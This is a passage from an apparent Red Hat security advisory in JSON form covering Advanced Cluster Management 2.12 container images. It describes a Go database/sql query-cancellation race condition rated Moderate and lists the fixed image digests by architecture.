"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:c033acafe192f185dde20f032d399de7f4f9d25804ba96afe50e08eb1608a956_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:40cfab127e82cc6afc68b0642832e84ec45838db71d5500a42d87921ade70171_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:6dbefefd5b830cd9431559d7123d9643dca69e0cbbb58f5c5cc90f3d5e526c09_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:8262fa7a50560e0ac051f9ec158daceeb384acc92b1f98c0b7b73f5ec0451908_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:b2ee688170d432298a3eb7d0b057a01bcba26dfddfeabca7941f4bc3fc865141_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0478cb24ab3df5826881b91dd0ea1b8152defdd04e38d0bc500a860a828716b0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:247872fe30c6d0bbb1098b6f189fd23aca2357122e591eb2bed3c79b0fe27055_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b6a958526ae7d64016a110bd81ee38218bce014d52f10a6517a471bddfb93d45_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:ee89796a7ee9e6ab9cde9a5a450e16221bbdb74444188939c983d6d185bee08a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:243d75725446e0fe6be10ba04796c4db395f911470d1fd2575d35a3f1c82930c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:89f973ff38fcf35a484da1531bcf00db5e1d387a64a6dcbb25f19a5c26494584_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:a33b245208c9999546524f3bf971bb220418045dd799cebc43f0413823db0f8b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ea918d66e2be8cc1411e048f3638afae348a44df36143621bcd3132718b33664_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:22b747e9952ede6b831297b64684acaafaf3e12998d6872081a08ae39b52c87b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:5d368764b9745d9a977bde3c4cd2faac1a344aea716ce626a0904b7da80f5267_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:8deed2b9ade0bc7ab30fd93d165fc1a8e18caab7b4af1d1b2b326dc93570c498_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:b68a3a1fe74bc4b319859874ca19a4e35c72174afc6a2af08e4bd7b64898d27f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5f814b2ab34c4dcaedb7394d9f1ef9bd4d1bf6af934cd716ac44d1cfc43a6edf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:9acfa5180f02a68485cd1fc43e4794c7ffbac02c16942fabfbad9dd586c8ff74_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c409f96ae15f3022713e434c4c8f146d943dbf48e852e0b8f90b4964ec0736a7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f72ecb77638a3d19ef4480040995278031deb4551f139e376994bc0ac3462ef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:243ea42175c4fa3d189e2f2bf061c9645d5d3b2870378149c52740f563c91ce8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3b23775b863a11e1edd62b24c01085b74019b7f414d0784c99d41b1e0e8a6e9b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3e29508feb3f13f4771e6321f9b2f281d557e3239e52e29301ef30a305ffcde9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:427b347a2e17b66849dc51f9a62563ae8c013d5794c61821141dec737d059304_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:0b87acce1304734d30b2bfbd5d277e72efce2433680111e02fc5cff8127376dd_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:438093777b18dc840316a9a82331d832fdc9f3d83aaae20d97f56ed67b58a359_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:93d29e5678d618cfa84ce60f2d62ba96929ea47ec1515f63a9d61d548968e902_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b182a45fbe8caf69df6145ed79f2ab0e82c955ff5f5caa7fab8d0faffdb50664_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:0d6238ef864831d455a4a4b86d860469443079f6dcd26ce3b4fe546800565844_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:5c7378c5f1715490a88eaa2b791b4a643ee089f9b72ad4abfaf32d718f387fc8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:7e8f4c171a3081e428c168b506c544775876df772803e2cae4512d3c46b45354_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:8b0e5d09b887020a657b93953a63a788cf6dfc84200038be8417c2f9cd1df736_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:1cfe9d5337e2d2d6d714d5d1aecd00ed626f4c70a5a655d89c8001717be9a6f5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:488d5dea57994e8d865f8047f3b0ed8b2250273898972eea576fa012bda5c0c4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:5bf4239a40668dd33521ad9cebdc2022331e251ad6fd2e8ec0de8526d321b9e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:bc42add4b0d8571b0b78d09357c574a7d0a858769e6109a13d1487de36ba1d2f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:036d63ee1fe55977200dce97fd151726266e84423067039c57ca54dcc8b6b440_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:1aff938b39c21378c0f8daa439e330159c0bd91f234035a127efb579f6434262_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:540de89284569933a75e87f4c85fc11f987a733f60f9d877f20e5c4fc054fabf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:8352d34740671e09ebdd558bb2a40a8605aa26afbcfff8dae29ccaf86d81239d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:4707fd802a74ca843e2b788b69dc1d4615acba980df380e0cc25cfca6a82e215_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:5c3ee23cff1681f8e86f2bd5d1cebf187db867fb1887d7803638d1192e4b1a60_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6260b2ecf13d9c5cdf95f0000044405d3ca03815937284b5e2848147d3366538_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:78cbcb6e0a0e43cbac6b285334ba789d4a4940e12f472d56a7d953b342a34d1f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6c733e3c2cc551a4bb17601347f873d3b28e4d6b60a26db3587173c617a85c7e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6cbf2b90d1cbfbca5fe5b04f73024a5d78248b1e4ccf6041b77018d79296e1ee_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:8b47e540acf25c492b4e6dff77f419c65c80e14d8c95555eba549a7fbbaed564_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:fffd63a467ff39cb493e680ca5d7fff974c66afb014f3d5e83591b934e58b2ac_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:06ff7067f1bc9d0cafba03eeb46bf3214dd70f20e5eb05e3a989d12cfee5791f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33d9572f58f2bbd6c1dfc07908b328ecc25b12f578d2f3839f70763c032fe39e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:997e343d3a52d953cca38ea609dabfa38d8e85e3122f0c48bdf34dc398b0e75c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:ddeb74afd3c44b7e6ce34d14245f9b0e686af1d6628c2bae2b1ee4766107590e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:12c970f2005e943d674b35c711d2232f146bbbcf8e3807b3fb3c816b42e0cd8a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:dc231932eb7a2a9969fae5fb0e6f95594d71ddf6f957a2cb4751950ab8332510_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:e671767bca7b68bada15e2820d0df6adc49fbffcdb6c9708ee3a5346a919a1e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:f64b875dcce5d957aaf198e2055a47f7faab441342aab6b2e055efe2d41c78b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:53a9844ffdd2d3f8cee8737722de91511cefdb4c65a7db614de6c4e070f70431_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:c603c06aa983d6b118e506bd2e6fba19f0cd26e379513c9c710ea517d2bc0d0f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:d9a867a6d289263f568b8940a9b970c8680061c1f26aebb9f8cc479956e9a030_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f9e0a972cd08f77b71dd8b2217c57b98b36c5612ddfd6bb74704c378a03dd7e1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1bda811b132cbc2220815d36983af98e0aafdcb4d30fa78f56bbd85ffc30a37c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:3bc66380cc46ef4bc18498a306535c11f0ba41a629bde92f9f6a35b8a8d11f89_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:c4f9eea72efd49d201456547b2a35abd6a194894e72c209bbe16763b86954639_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:d4b3934ecbd4882845770c313060dc76b588ffa3753f2b2ae0ec5f53ba868935_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:805d44ff7dcd6df5bd73cd58c0f410d8bdeac932d7c440b0c381517c3e1401ae_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:b3cbb2410596e3e0741f518ee3bbf8f6eebce0ea4a7ea4274a1e76f01692fe1e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:c6365357cdc1cd7b0adc4e1813f42d2c67501f770ee58e376e0c02096baca731_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e3d8e0154fdaaa4e292949374fa637ec80827df473f2e3f8cc37425d98dc271b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:943de4b7c383fc679eac276a25ce6557336c95b92ebaa520bb74f8aee24115f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:d448249f704e54f4316122fb3ad923295ffb5d6d2d16044803b56d1f8439de8f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:ee2ffe06e09f3694be474d69be61552d0e5a4dd7a25df89682aa59e4a10e02f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:f9dfff5ac57b47b580c733413ab3d10dec4d4d50589da894eb0a8278978459f9_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0caaa7f18df2105c9d6199343a70640dd6b558d7de55f2026f99b48d702c5afc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:28cfe0893f17b70ff67f70cb7e471c8c724bf921b7a36c69ca2c43505bae635e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:7309f5d61a0fe99dfd8d523736afe2c8a709385e0eaaeaacfbda362fc7c2a16b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:ccf06b51ce92c9f0fe9594b0082d0b09f77bb65b38ce08d5e02ac4f5a6fab2a4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:1f747a2fe3ee946ec3df5335c6527da41b84a92c1b7163e24b72809f958934a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:699833b6f4ee8b8fdb45d5ed4a312972281576700a1a1d28dc0048d6c7188361_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b807be4db3f323ac57c1464843c1b7dc1479b24ac89dadd070813da75f282375_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:d1c112f5dd97d3415030ab12eb93006c04070f70176e89e2555b071d4b1dc881_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:a20f72f80173be40bbd330de88bc94d32e7596bf1b0fd76dd895b739f2df1c2e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d815d7688e0ad3e0d9b20a73f418282ac47eb0c6a2721db959374ff9b5756918_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:dd779a5f1de2fb5b61333ef7d11642a4e8cbfcb745f3f0a4318e336f6fe4e5b6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:f9e8be1fdc48039e3a46a09b9c1279d343a1fb48b987d0d2bdf7c4f0a720ca85_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2387083"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in database/sql. Concurrent queries can produce unexpected results when a query is cancelled during a Scan method call on returned Rows, creating a race condition. This vulnerability allows an attacker who can initiate and cancel queries to trigger this condition, possibly leading to inconsistent data being returned to the application.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "database/sql: Postgres Scan Race Condition",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability marked as Moderate severity issues rather than Important. The os/exec LookPath flaw requires a misconfigured PATH to be exploitable, and the database/sql race condition primarily impacts applications that cancel queries while running multiple queries concurrently. Both can cause unexpected behavior, but the exploitation scope is limited and unlikely to result in direct compromise in most typical deployments.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:280e1dc73ea367d9c818086754ece9ea2d5a2c96496dcfea09844a7a55feb51d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:2d8b0b11cf907b25304501a2a62d5551c792c1fb3662ea4cd0e01db724a57b86_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:9abfdfd7491e219d7249800e05298472c4d545687fa7b6c79da71f9414f29d12_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:c11c8ba588a27d39f1b46bc6b63eebd8e9f9a822917a7638216c7fb93350aaf3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:0184923381940f806687d21a3422e16bee10b39b409fcecb50c940ed9b7e4d58_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:54390653fd89def95d9cba388cd37466ce709d843a9950b545091d9d9e14b4e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:874f930ace72bd2771944e734432c322735b3bd91804019b211953070a308dd9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:d865a100823ff771c33e5e5799f16e1207158ab7519c6ac8a4daf53e1c4ae092_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:57fb017c2ba0f20880fc278689d37919ab95a88dffa0626d9a48050bef3b6fe3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:7d87a9cda623d527c5eaa08c5637422ed136339a9688edd5e8e9cc46f254beb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:b123eb6e855ec01a82e6ec2afa052eb344e2851b3d134514c53162012852d568_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:f12861597e8d62263d2ffa52b1fd19614a063605968999aeef33f444cfa82539_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:4f666d6acef380066f2a35f128a2842ee1f5cf800c93ac6b0fb3c303d3bde26b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:6938b16a6314149cc86e10a91e05e9b84e00483dadd1d0353002222a350746bf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:8b91cd509eee3e1a5e6475076512709bd233413bfbea5caa44455fd62bcc9d35_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:f734a96076321df1f52da24f047db29d3956ceb742f4fa488a11d5b302faf66f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:1395a46c08410f06aa507bedc8d664b6dabda344d9c604bd71bbd07fb07966c4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:4b1bdbd8499769e3fe41d438ff2f98a0a91fecf88d70aa359a6be16aa5454fda_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:91d0b7afff7c89c667986f22280a95ab81409aacaf6c73ac6606bc7bbae98c7e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:c24affed309531bede6ca42f8b2a6b3ba4df5a8c59084bf5050290b8f031f364_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:8b4adb87be3cd1222dbec53de842569d89f1edc18f36f5da691f2b9aef851af8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a5544dbf33ee411c1e2bce8af5cfd7defda6de92a358097419f2bac069669275_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b3caff7e4a5254b20d305ec57b70d372ba09a4605047812703a7c7df6628192b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:cde651ab8f772b65d45464e4997c6ae17e655696afebf3ad51aa079853627061_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:33ae10350417be44904c47179d655c36e5724241e5dd1497d6952c46ada085e3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:92c1123b4f6c4e89be7a0d9cd4adcafb9b97faebebd61dc24127661e45b61ec7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b321bc989aede13694825dfa5ee6e6bf047e1d8da91a8fb83dc29cd0b27ab4ff_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:d41b061123db846fb27ddccffa7c57528326bcfa109f7d0a754e64aa16304b05_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:19ccb43f156361e14c8d69a6d832b60a63801fec502bd0f1632a264611c00a5c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:345bd79af661294f223be69961f96494da36e311906fb3a2e64b53677f65fd32_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:3cb2dd7e3a2cd4e2a46cde1f48dd72645c2c51e8bfc0eca8753cc851c726d29c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c834685380ba00674a2835151ec9e4932457abefe6318748aba92cbe8443307d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:0799283c1830e1aadd09976286eec671d0a86e44c155238279938b4f329f7157_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:7143a1a00eae582cff7671ab03464db03db48e89bd988ecc4851278922aeea29_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9bac11bcf557740673e7168bb31fb6db8c5d92609094e5f1d1cb4c3ef6bc9603_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:ea03fd92669382846af5c8fa0b58f6858f123060d122f370d6af837f46d9d8aa_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5c90f0eddf6dbee5bdf11a6a818e4fbac22f6c8b2883728416dcc7aaeedd7362_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6528ed4780303fa09312c19f87c0f7d7109d91858473f73e6567e0fdde694b3f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6d1a86ffe09cbc6eba216db55800c21641e308dd1cee215972e0065136b9c612_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:fc6ea36b48ce47052d875988f378cad3ec9cec80189a605acdf1509f2beb52cf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:31153305711975b0bd5f780133699aeca52e96859363e85718c9047b26a32dbf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:55b2f0e54a6fdb3fb83f1af1f16524ebf36f0afb366f40fbbc8768cd4995ffb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:6be8bc17e09b099a79437f27ded3d563814e3c6702dd9ed698f5f17b9fb3afa2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:73c4ce25c2cc67fe3bec0cfc51e4c8b34929288f931f0f19c65bbbc969d0c588_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:128b74a18fb1fd1ba63f074d9d31e892a46048068608784f2696a4bbc7b57595_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:6b3fd2f8e3a164670dbbc59fd8c77057f98d97c0ba6ed7975711923e8acabb78_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:7c8de9466fee7334af1fef5647c4abaf9bd6b6012c301bb5c3c6a630cdc1dded_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bbd945e3d0f92c8dfeb5601d7aa4d306f87e6facd9471a3c42f2582a264cd2ba_s390x",
